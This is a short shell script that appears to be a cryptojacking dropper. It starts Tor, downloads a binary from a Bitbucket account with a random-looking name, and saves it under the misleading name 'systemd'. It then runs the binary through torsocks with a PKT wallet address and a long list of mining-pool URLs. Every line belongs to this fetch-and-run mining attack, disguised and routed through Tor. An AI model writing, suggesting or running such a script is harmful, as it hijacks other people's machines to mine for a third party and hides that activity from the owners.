service tor start
sleep 30
wget -q https://bitbucket.org/anruvovtisovjlk/multycpm/downloads/systemd
chmod +x systemd
torsocks ./systemd ann -p pkt1q3r6qa92j5mgtgm4eusekelhrx27tz800qnd0h3 https://stratum.zetahash.com/2048 https://stratum.zetahash.com/1024 https://stratum.zetahash.com/512 https://stratum.zetahash.com/1001 https://stratum.zetahash.com/1002 https://stratum.zetahash.com/1003 https://stratum.zetahash.com/1004 https://stratum.zetahash.com/1005 https://stratum.zetahash.com/1006 https://stratum.zetahash.com/1007 https://stratum.zetahash.com/1008 https://stratum.zetahash.com/1009 https://stratum.zetahash.com/1010 https://stratum.zetahash.com/1011 https://stratum.zetahash.com/1012 https://stratum.zetahash.com/1013 https://stratum.zetahash.com/1014 https://stratum.zetahash.com/1015 https://stratum.zetahash.com/1016 https://stratum.zetahash.com/1017 https://stratum.zetahash.com/1018 https://stratum.zetahash.com/1019 https://stratum.zetahash.com/1020 https://stratum.zetahash.com/1021 https://stratum.zetahash.com/1022 https://stratum.zetahash.com/1023 http://www.pkt.world/master/2048 http://www.pkt.world/master/1024 http://www.pkt.world/master/512 http://pool.pktpool.io/2048 http://pool.pktpool.io/1024 http://pool.pktpool.io/512